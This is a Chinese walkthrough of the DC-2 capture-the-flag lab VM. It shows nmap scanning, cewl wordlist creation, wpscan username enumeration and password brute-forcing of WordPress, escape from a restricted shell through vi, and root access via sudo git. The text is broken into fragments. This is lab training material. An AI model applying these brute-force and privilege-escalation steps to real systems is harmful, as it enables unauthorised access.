声明:本文来自冰尘师傅的投稿,DC-2靶场实战 为 DC靶场实战系列第一篇,感谢冰尘师傅的投稿!
一、环境部署
-
虚拟环境:vmware -
网络:NAT部署 -
攻击端:kali -
靶机:DC-2
二、信息收集
1.IP扫描
nmap
-sP
192.168.117.0
/
24
-
192
.168
.117
.152
2.端口扫描
nmap
-sS
192
.168
.117
.152
-p
1
-65535
-
80
http
7744
telnet
192
.168
.117
.152
7744
-
7744
ssh
3.深度挖掘
访问80端口:
http:
//192.168.117.152
-
http:
//dc-2
vim
/etc/hosts
-
添加下面内容 -
注意中间不是空格是Tab
192
.168
.117
.152
dc-2
三、渗透测试
1.再次访问80,flag1
http:
//dc-2
-
提示使用 cewl 命令
2.构建密码字典
cewl
http://dc-2 > passwd.txt
或
cewl
http://dc-2 -o passwd.txt
-
字典
passwd
.txt
3.目录扫描
dirsearch -u http:
//dc-2
-
http:
//dc-2/wp-login.php
发现是wps框架
4.账号爆破
-
登录页
密码本
wps框架
wpscan
--url http://dc-2 -e u
-
admin
jerry
tom
5.制作账号本
echo
"name"
> user.txt
echo
"jerry"
user.txt
echo
"tom"
user.txt
得到账号本:
-
user
.txt
6.登录爆破
wpscan
--url http://dc-2/ -U user.txt -P passwd.txt
得到两个账号密码:
-
jerry/adipiscing
tom/parturient
7.登录,信息收集,flag2
-
这里什么也没有,换个地方看看
四、权限提升
1.尝试ssh连接
ssh
tom
@
dc
-
2
-p
7744
2.查看权限
ls
cat
flag3.txt
compgen
-c
-
vi
less
3.获取flag3
vi
flag3
.txt
-
下一步获取jerry权限
4.提升权限
:set
shell=
/bin/sh
:shell
5.得到flag4
cd
../jerry
ls
vi
flag4.txt
-
已经没有提示了,需要靠自己得到
final
flag
6.登录jerry
/bin/su jerry
adipiscing
-
jerry
shell
7.尝试sudo提权
sudo
-l
-
/usr/bin/git
8.git提权
sudo
git help config
!/bin/bash
whoami
-
root
shell
9.获取final-flag.txt
cd
~
ls
cat final-flag.txt
原文始发于微信公众号(安诺信安):DC-2靶场实战 - DC靶场实战系列(一)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论